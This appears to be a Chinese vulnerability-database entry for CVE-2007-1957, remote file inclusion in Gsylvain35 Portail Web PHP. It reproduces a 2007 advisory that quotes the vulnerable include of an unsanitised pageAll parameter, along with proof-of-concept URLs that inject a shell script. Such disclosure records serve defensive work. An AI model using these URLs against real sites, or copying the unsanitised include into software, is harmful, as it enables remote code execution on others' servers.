Guernion Sylvain Portail Web Php 多个PHP代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191068 漏洞类型 未知
发布时间 2007-04-10 更新时间 2007-04-10
CVE编号 CVE-2007-1957 CNNVD-ID CNNVD-200704-145
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/86354
https://cxsecurity.com/issue/WLB-2007040050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-145
|漏洞详情
GuernionSylvainPortailWebPhp(又称Gsylvain35PortailWeb,PwP)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)template/Vert/或(2)template/Noir/中的index.php的pageAll参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM

# Tilte: Gsylvain35 Portail Web Remote File Include Vulnerabilities

# Author..................: [the_Edit0r]
# Homepage ...............: [Www.XmorS-SEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [Gsylvain35 Portail Web] 
# Site Script ............: [http://sourceforge.net/projects/portail-web-php/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]

------------------------------------- Codes --------------------------------

<?php  
}else
{
 include (get_root()."/".$_GET['pageAll']);
} 
?>

------------------------------- proof Of Concept ---------------------------
 
 www.example.com/[path]/template/Vert/index.php?pageAll=[Sh3ll-Script]
 www.example.com/[path]/template/Noir/index.php?pageAll=[Sh3ll-Script]

------------------------------------------------------------------------
----
 
 
# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]
|受影响的产品
Guernion Sylvain Portail Web Php 0
|参考资料

来源:BUGTRAQ
名称:20070408Gsylvain35PortailWebRemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/465083/100/0/threaded
来源:OSVDB
名称:35290
链接:http://osvdb.org/35290
来源:SREASON
名称:2543
链接:http://securityreason.com/securityalert/2543